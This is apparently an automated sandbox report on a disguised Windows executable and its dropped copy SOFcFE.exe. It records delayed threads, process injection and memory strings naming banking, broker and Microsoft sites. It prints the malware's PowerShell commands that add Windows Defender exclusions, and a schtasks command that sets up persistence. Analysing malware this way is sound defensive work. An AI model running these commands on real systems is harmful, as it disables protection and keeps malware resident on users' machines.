Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 596108
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595998
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595889
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595780
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595672
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595561
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595343
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595124
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 594789
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 594646
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 594024
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593916
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593719
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593609
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593470
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593356
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Thread delayed: delay time: 593249

Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: GeriOdemeBildirimi942.rar.xlxs.pdf.exe, 0000000E.00000002.3762229571.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: SOFcFE.exe, 00000014.00000002.3761035622.0000000001016000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: SOFcFE.exe, 00000014.00000002.3768922904.000000000404C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\SOFcFE.exe

Code function: 20_2_06A797B0 LdrInitializeThunk,

20_2_06A797B0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Memory written: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Memory written: C:\Users\user\AppData\Roaming\SOFcFE.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Process created: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SOFcFE.exe	Process created: C:\Users\user\AppData\Roaming\SOFcFE.exe "C:\Users\user\AppData\Roaming\SOFcFE.exe"	Jump to behavior

Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
